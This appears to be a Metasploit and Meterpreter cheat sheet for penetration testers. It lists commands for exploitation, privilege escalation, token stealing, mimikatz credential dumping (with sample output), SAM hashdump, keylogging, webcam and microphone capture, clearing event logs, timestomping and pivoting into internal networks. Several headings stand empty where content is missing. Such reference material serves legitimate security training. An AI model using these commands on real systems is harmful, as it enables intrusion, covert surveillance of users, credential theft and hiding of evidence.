Link to this headingMeterpreter Shell
Run in a Docker:
Using a bash function:
Link to this headingMetasploit Console Basics
Search for module:
msf > search [regex]
Specify and exploit to use:
msf > use exploit/[ExploitPath]
Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]
Show options for the current modules:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
Metasploit shell upgrade:
sessions -u
Link to this headingSystem Commands
cd Change directory
lcd Change directory on local (attacker's) machine
clearev Clear the event log
download Move files to the target machine
drop_token Relinquishes any active impersonation token.
edit Open a file in the default editor (typically vi)
execute Execute a command with the privileges of the process the Meterpreter is loaded in
getenv Get one or more environment variable values
getpid Get the current process identifier that Meterpreter is running inside
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that that Meterpreter is running with
kill Terminate a process
ps List running processes
migrate Jump to a given destination process ID
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
upload Move files from the target machine
timestomp Alter NTFS file timestamps
Link to this headingIncognito Commands
meterpreter > load incognito
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
meterpreter > add_user newuser password -h 192.168.20.30 #Attempt to create user on Domain Controller
Link to this headingUser interface Commands
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds that the GUI of the target machine has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl \[enable/disable\] \[keyboard/mouse\]: Enable/disable either the mouse or keyboard of the target machine
Link to this headingWebcam Commands
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
screengrab Attempt to grab screen shot from process's active desktop
Link to this headingElevate Commands
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
getsystem Attempt to elevate your privilege to that of local system.
Link to this headingPassword database Commands
hashdump Dumps the contents of the SAM database
Link to this headingMimikatz Commands
meterpreter > load mimikatz
kerberos Attempt to retrieve kerberos creds
livessp Attempt to retrieve livessp creds
mimikatz_command Run a custom commannd
msv Attempt to retrieve msv creds (hashes)
ssp Attempt to retrieve ssp creds
tspkg Attempt to retrieve tspkg creds
wdigest Attempt to retrieve wdigest creds
Link to this headingSniffer Commands
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_release Free captured packets on a specific interface instead of downloading them
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface
Link to this headingLanattacks
dhcp_load_options Load DHCP optionis from a datastore
dhcp_log Log DHCP server activity
dhcp_reset Reset the DHCP server
dhcp_set_option Set a DHCP server option
dhcp_start Start the DHCP server
dhcp_stop Stop the DHCP server
tftp_add_file Add a file to the TFTP server
tftp_reset Reset the TFTP server
tftp_start Start the TFTP server
tftp_stop Stop the TFTP server
Link to this headingPivoting
Use Meterpreter Session to Pivot onto other Systems
meterpreter > run get_local_subnets
meterpreter > background
msf exploit(handler) > route add <localsubnet> <netmask> [session]run
ipconfig Show network interface information
portfwd Forward packets through TCP session
route Manage/view the system's routing table
Link to this headingUseful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
Proxy Server
msf > use auxiliary/server/socks4
msf > run
Link to this headingManaging Sessions
Exploit and background Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z
Run the exploit in the background expecting one or more sessions that are immediately backgrounded:
msf > exploit –j
List all current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
Link to this headingManaging Multable Sessions
List all backgrounded sessions:
msf > sessions -l
Interact with a backgrounded session:
msf > session -i [SessionID]
Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
Link to this headingPost Exploitation
Link to this headingMigrating processes
Migrate metasploit to another process:
meterpreter > migrate 1450
Link to this headingPrivlage Esclation####
Load extensions:
meterpreter > load mimikatz
meterpreter > load incognito
Privilege Escalation:
meterpreter > use priv
meterpreter > getsystem
meterpreter > getuid
Token Impersonation:
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token DOMAIN\User
Steal Token:
meterpreter > steal_token [user PID]
Attempt to retrieve Kerberos or Livessp credentials:
meterpreter > load mimikatz
Loading extension mimikatz...Success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x00000012) There are no more files. n.a. (msv1_0 KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (kerberos KO)
meterpreter > livessp
[+] Running as SYSTEM
[*] Retrieving livessp credentials
livessp credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (livessp KO)
meterpreter > ssp
[+] Running as SYSTEM
[*] Retrieving ssp credentials
ssp credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate NT AUTHORITY NETWORK SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;997 Negotiate NT AUTHORITY LOCAL SERVICE mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;47269 NTLM mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
0;999 NTLM THINC RALPH$ mod_memory::searchMemory NT5 (0x0000007f) The specified procedure could not be found. n.a. (tspkg KO)
meterpreter >
Link to this headingPivot into internal network
Attempt to create user on Domain Controller:
Pivot to other systems in the local network:
Link to this headingAutopwn
Download the Autopwn module: